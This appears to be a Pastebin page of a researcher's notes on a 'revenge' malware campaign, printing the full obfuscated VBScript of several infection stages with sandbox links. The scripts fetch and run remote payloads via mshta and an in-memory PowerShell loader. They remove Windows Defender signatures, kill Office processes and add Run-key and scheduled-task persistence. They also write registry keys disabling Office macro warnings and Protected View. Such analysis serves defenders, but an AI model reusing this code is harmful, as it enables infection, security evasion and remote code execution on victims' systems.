API tools faq
paste
Advertisement
ps66uk

revenge-20190701

ps66uk
Jul 1st, 2019
2,229
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.81 KB | None | 0 0
raw download clone embed print report
  1. #revenge notes 20190701
  2. https://app.any.run/tasks/ea9a2b92-e65e-4f5a-9c49-ab5b3e6de4c9
  3.  
  4. ----STAGE1----
  5. https://welcometotechblogs.blogspot.com/p/cheryl.html
  6. https://urlscan.io/result/7db422e3-0b18-4f28-9518-99a10cd06ba5
  7. ----
  8.  
  9. <script language="VBScript">
  10. Set Xkasdj2 = CreateObject(StrReverse(StrReverse("WScript.Shell")))
  11. Xa_aw1 = StrReverse(StrReverse("h")) + StrReverse(StrReverse(StrReverse(StrReverse("t")))) + StrReverse(StrReverse(StrReverse(StrReverse("t")))) + StrReverse(StrReverse("p")) + StrReverse(":") + StrReverse(StrReverse(StrReverse(StrReverse("/")))) + StrReverse(StrReverse(StrReverse(StrReverse("/")))) + StrReverse(StrReverse(StrReverse(StrReverse("w")))) + StrReverse(StrReverse(StrReverse(StrReverse("w")))) + StrReverse(StrReverse(StrReverse(StrReverse("w")))) + StrReverse(StrReverse(".")) + StrReverse(StrReverse("p")) + StrReverse(StrReverse("a")) + StrReverse(StrReverse("s")) + StrReverse(StrReverse(StrReverse(StrReverse("t")))) + StrReverse("e") + StrReverse("b") + StrReverse("i") + StrReverse("n") + StrReverse(StrReverse(".")) + StrReverse("c") + StrReverse("o") + StrReverse(StrReverse("m")) + StrReverse(StrReverse(StrReverse(StrReverse("/")))) + StrReverse("r") + StrReverse(StrReverse("a")) + StrReverse(StrReverse(StrReverse(StrReverse("w")))) + StrReverse(StrReverse(StrReverse(StrReverse("/"))))
  12. Xa_aw0 = StrReverse(StrReverse("m")) + StrReverse(StrReverse("s")) + StrReverse(StrReverse("h")) + StrReverse(StrReverse(StrReverse(StrReverse("t")))) + StrReverse(" a")
  13. Xa_aw2 = "tmDQAps5"
  14. XXX = Xa_aw0 + Xa_aw1 + Xa_aw2
  15. Morg = XXX
  16. Xa_aw = Morg
  17. Xkasdj2.Run Xa_aw, vbHide
  18. self.close
  19. </script>
  20.  
  21.  
  22. ----STAGE2----
  23. https://pastebin.com/raw/tmDQAps5
  24. ----
  25.  
  26. <script language="VBScript">
  27.  
  28. Set X7W832DSA = CreateObject(StrReverse("llehS.tpircSW"))
  29. Dim ASSd712ji8asd
  30. ASSd712ji8asd = "cmd.exe /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & taskkill /f /im MSASCuiL.exe & taskkill /f /im MpCmdRun.exe & exit"
  31. X7W832DSA.Run ASSd712ji8asd, vbHide
  32.  
  33. Set X_ws = CreateObject("WScript.Shell")
  34. Pa_2da = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\CCleanerUpdate"
  35. X_ws.RegWrite Pa_2da,"mshta.exe http://pastebin.com/raw/PGEcvceN","REG_EXPAND_SZ"
  36.  
  37. Set x_S = CreateObject(StrReverse(StrReverse("WScript.Shell")))
  38. Dim MS_Xa
  39. MS_Xa0 = StrReverse("/'+'w'+'a'+'r'+'/'+'m'+'o'+'c'+'.'+'n'+'i'+'b'+'e'+'t'+'s'+'a'+'p'+'/'+'/'+':'+'s'+'p'+'t'+'t'+'h'(gNiRTSdAolNwoD.)tneilCbeW.teN tcejbO-weN(( = s_AS$ xEON- exe.llehsrewop")
  40. MS_Xa1 = "PGEcvceN'));$SA_s="
  41. MS_Xa2 = StrReverse(";)X$,S$(ekovni.tnioPyrtnE.w_DSA$;)W_iC$(daoL.)(niamoDteG::]daerhT.gnidaerhT.metsyS[ = w_DSA$;)s_AS$(gnirtS46esaBmorF::]trevnoC.metsyS[ = W_iC$]][etyb[;)s_AS$(esreveR::]yarrA[;)(yarrArahCoT.s_AS$ = s_AS$;)'0','.'(ecalper.s_AS$")
  42. MS_Xa = MS_Xa0 + MS_Xa1 + MS_Xa2
  43. x_S.Run MS_Xa, vbHide
  44.  
  45. Set Mi_G = CreateObject(StrReverse(StrReverse("WScript.Shell")))
  46. Dim X_hw
  47. X_hw0 = StrReverse("t/ 02 om/ ETUNIM cs/ etaerc/ sksathcs")
  48. X_hw1 = "n ""Avast Updater"" /tr ""mshta.ex"
  49. X_hw2 = "e http://pastebin.com/raw/rQtfery0"" /F "
  50. X_hw = X_hw0 + X_hw1 + X_hw2
  51. Mi_G.Run X_hw, vbHide
  52.  
  53. Set MySexoPhone = CreateObject(StrReverse("llehS.tpircSW"))
  54. MySexoPhone.RegWrite StrReverse("sgninraWABV\ytiruceS\droW\0.11\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  55. MySexoPhone.RegWrite StrReverse("sgninraWABV\ytiruceS\droW\0.21\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  56. MySexoPhone.RegWrite StrReverse("sgninraWABV\ytiruceS\droW\0.41\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  57. MySexoPhone.RegWrite StrReverse("sgninraWABV\ytiruceS\droW\0.51\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  58. MySexoPhone.RegWrite StrReverse("sgninraWABV\ytiruceS\droW\0.61\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  59. MySexoPhone.RegWrite StrReverse("sgninraWABV\ytiruceS\tnioPrewoP\0.11\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  60. MySexoPhone.RegWrite StrReverse("sgninraWABV\ytiruceS\tnioPrewoP\0.21\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  61. MySexoPhone.RegWrite StrReverse("sgninraWABV\ytiruceS\tnioPrewoP\0.41\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  62. MySexoPhone.RegWrite StrReverse("sgninraWABV\ytiruceS\tnioPrewoP\0.51\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  63. MySexoPhone.RegWrite StrReverse("sgninraWABV\ytiruceS\tnioPrewoP\0.61\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  64. MySexoPhone.RegWrite StrReverse("sgninraWABV\ytiruceS\lecxE\0.11\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  65. MySexoPhone.RegWrite StrReverse("sgninraWABV\ytiruceS\lecxE\0.21\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  66. MySexoPhone.RegWrite StrReverse("sgninraWABV\ytiruceS\lecxE\0.41\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  67. MySexoPhone.RegWrite StrReverse("sgninraWABV\ytiruceS\lecxE\0.51\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  68. MySexoPhone.RegWrite StrReverse("sgninraWABV\ytiruceS\lecxE\0.61\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  69. MySexoPhone.RegWrite StrReverse("VPnIseliFtenretnIelbasiD\weiVdetcetorP\ytiruceS\droW\0.11\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  70. MySexoPhone.RegWrite StrReverse("VPnIstnemehcattAelbasiD\weiVdetcetorP\ytiruceS\droW\0.11\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  71. MySexoPhone.RegWrite StrReverse("VPnIsnoitacoLefasnUelbasiD\weiVdetcetorP\ytiruceS\droW\0.11\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  72. MySexoPhone.RegWrite StrReverse("VPnIseliFtenretnIelbasiD\weiVdetcetorP\ytiruceS\tnioPrewoP\0.11\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  73. MySexoPhone.RegWrite StrReverse("VPnIstnemehcattAelbasiD\weiVdetcetorP\ytiruceS\tnioPrewoP\0.11\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  74. MySexoPhone.RegWrite StrReverse("VPnIsnoitacoLefasnUelbasiD\weiVdetcetorP\ytiruceS\tnioPrewoP\0.11\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  75. MySexoPhone.RegWrite StrReverse("VPnIseliFtenretnIelbasiD\weiVdetcetorP\ytiruceS\lecxE\0.11\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  76. MySexoPhone.RegWrite StrReverse("VPnIstnemehcattAelbasiD\weiVdetcetorP\ytiruceS\lecxE\0.11\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  77. MySexoPhone.RegWrite StrReverse("VPnIsnoitacoLefasnUelbasiD\weiVdetcetorP\ytiruceS\lecxE\0.11\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  78. MySexoPhone.RegWrite StrReverse("VPnIseliFtenretnIelbasiD\weiVdetcetorP\ytiruceS\droW\0.21\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  79. MySexoPhone.RegWrite StrReverse("VPnIstnemehcattAelbasiD\weiVdetcetorP\ytiruceS\droW\0.21\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  80. MySexoPhone.RegWrite StrReverse("VPnIsnoitacoLefasnUelbasiD\weiVdetcetorP\ytiruceS\droW\0.21\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  81. MySexoPhone.RegWrite StrReverse("VPnIseliFtenretnIelbasiD\weiVdetcetorP\ytiruceS\tnioPrewoP\0.21\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  82. MySexoPhone.RegWrite StrReverse("VPnIstnemehcattAelbasiD\weiVdetcetorP\ytiruceS\tnioPrewoP\0.21\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  83. MySexoPhone.RegWrite StrReverse("VPnIsnoitacoLefasnUelbasiD\weiVdetcetorP\ytiruceS\tnioPrewoP\0.21\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  84. MySexoPhone.RegWrite StrReverse("VPnIseliFtenretnIelbasiD\weiVdetcetorP\ytiruceS\lecxE\0.21\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  85. MySexoPhone.RegWrite StrReverse("VPnIstnemehcattAelbasiD\weiVdetcetorP\ytiruceS\lecxE\0.21\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  86. MySexoPhone.RegWrite StrReverse("VPnIsnoitacoLefasnUelbasiD\weiVdetcetorP\ytiruceS\lecxE\0.21\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  87. MySexoPhone.RegWrite StrReverse("VPnIseliFtenretnIelbasiD\weiVdetcetorP\ytiruceS\droW\0.41\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  88. MySexoPhone.RegWrite StrReverse("VPnIstnemehcattAelbasiD\weiVdetcetorP\ytiruceS\droW\0.41\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  89. MySexoPhone.RegWrite StrReverse("VPnIsnoitacoLefasnUelbasiD\weiVdetcetorP\ytiruceS\droW\0.41\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  90. MySexoPhone.RegWrite StrReverse("VPnIseliFtenretnIelbasiD\weiVdetcetorP\ytiruceS\tnioPrewoP\0.41\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  91. MySexoPhone.RegWrite StrReverse("VPnIstnemehcattAelbasiD\weiVdetcetorP\ytiruceS\tnioPrewoP\0.41\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  92. MySexoPhone.RegWrite StrReverse("VPnIsnoitacoLefasnUelbasiD\weiVdetcetorP\ytiruceS\tnioPrewoP\0.41\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  93. MySexoPhone.RegWrite StrReverse("VPnIseliFtenretnIelbasiD\weiVdetcetorP\ytiruceS\lecxE\0.41\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  94. MySexoPhone.RegWrite StrReverse("VPnIstnemehcattAelbasiD\weiVdetcetorP\ytiruceS\lecxE\0.41\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  95. MySexoPhone.RegWrite StrReverse("VPnIsnoitacoLefasnUelbasiD\weiVdetcetorP\ytiruceS\lecxE\0.41\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  96. MySexoPhone.RegWrite StrReverse("VPnIseliFtenretnIelbasiD\weiVdetcetorP\ytiruceS\droW\0.51\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  97. MySexoPhone.RegWrite StrReverse("VPnIstnemehcattAelbasiD\weiVdetcetorP\ytiruceS\droW\0.51\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  98. MySexoPhone.RegWrite StrReverse("VPnIsnoitacoLefasnUelbasiD\weiVdetcetorP\ytiruceS\droW\0.51\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  99. MySexoPhone.RegWrite StrReverse("VPnIseliFtenretnIelbasiD\weiVdetcetorP\ytiruceS\tnioPrewoP\0.51\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  100. MySexoPhone.RegWrite StrReverse("VPnIstnemehcattAelbasiD\weiVdetcetorP\ytiruceS\tnioPrewoP\0.51\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  101. MySexoPhone.RegWrite StrReverse("VPnIsnoitacoLefasnUelbasiD\weiVdetcetorP\ytiruceS\tnioPrewoP\0.51\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  102. MySexoPhone.RegWrite StrReverse("VPnIseliFtenretnIelbasiD\weiVdetcetorP\ytiruceS\lecxE\0.51\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  103. MySexoPhone.RegWrite StrReverse("VPnIstnemehcattAelbasiD\weiVdetcetorP\ytiruceS\lecxE\0.51\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  104. MySexoPhone.RegWrite StrReverse("VPnIsnoitacoLefasnUelbasiD\weiVdetcetorP\ytiruceS\lecxE\0.51\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  105. MySexoPhone.RegWrite StrReverse("VPnIseliFtenretnIelbasiD\weiVdetcetorP\ytiruceS\droW\0.61\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  106. MySexoPhone.RegWrite StrReverse("VPnIstnemehcattAelbasiD\weiVdetcetorP\ytiruceS\droW\0.61\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  107. MySexoPhone.RegWrite StrReverse("VPnIsnoitacoLefasnUelbasiD\weiVdetcetorP\ytiruceS\droW\0.61\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  108. MySexoPhone.RegWrite StrReverse("VPnIseliFtenretnIelbasiD\weiVdetcetorP\ytiruceS\tnioPrewoP\0.61\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  109. MySexoPhone.RegWrite StrReverse("VPnIstnemehcattAelbasiD\weiVdetcetorP\ytiruceS\tnioPrewoP\0.61\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  110. MySexoPhone.RegWrite StrReverse("VPnIsnoitacoLefasnUelbasiD\weiVdetcetorP\ytiruceS\tnioPrewoP\0.61\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  111. MySexoPhone.RegWrite StrReverse("VPnIseliFtenretnIelbasiD\weiVdetcetorP\ytiruceS\lecxE\0.61\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  112. MySexoPhone.RegWrite StrReverse("VPnIstnemehcattAelbasiD\weiVdetcetorP\ytiruceS\lecxE\0.61\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  113. MySexoPhone.RegWrite StrReverse("VPnIsnoitacoLefasnUelbasiD\weiVdetcetorP\ytiruceS\lecxE\0.61\eciffO\tfosorciM\erawtfoS\UCKH"), 1, StrReverse("DROWD_GER")
  114.  
  115. self.close
  116. </script>
  117.  
  118.  
  119. ----STAGE3-EXE----
  120. https://pastebin.com/raw/PGEcvceN
  121. ----
  122.  
  123.  
  124. ----STAGE4-VBS----
  125. scheduled task (redownload EXE)
  126. https://pastebin.com/raw/rQtfery0
  127. ----
  128.  
  129. <script language="VBScript">
  130. Set x_S = CreateObject(StrReverse(StrReverse("WScript.Shell")))
  131. Dim MS_Xa
  132. MS_Xa0 = StrReverse("/'+'w'+'a'+'r'+'/'+'m'+'o'+'c'+'.'+'n'+'i'+'b'+'e'+'t'+'s'+'a'+'p'+'/'+'/'+':'+'s'+'p'+'t'+'t'+'h'(gNiRTSdAolNwoD.)tneilCbeW.teN tcejbO-weN(( = s_AS$ xEON- exe.llehsrewop")
  133. MS_Xa1 = "PGEcvceN'));$SA_s="
  134. MS_Xa2 = StrReverse(";)X$,S$(ekovni.tnioPyrtnE.w_DSA$;)W_iC$(daoL.)(niamoDteG::]daerhT.gnidaerhT.metsyS[ = w_DSA$;)s_AS$(gnirtS46esaBmorF::]trevnoC.metsyS[ = W_iC$]][etyb[;)s_AS$(esreveR::]yarrA[;)(yarrArahCoT.s_AS$ = s_AS$;)'0','.'(ecalper.s_AS$")
  135. MS_Xa = MS_Xa0 + MS_Xa1 + MS_Xa2
  136. x_S.Run MS_Xa, vbHide
  137. self.close
  138. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!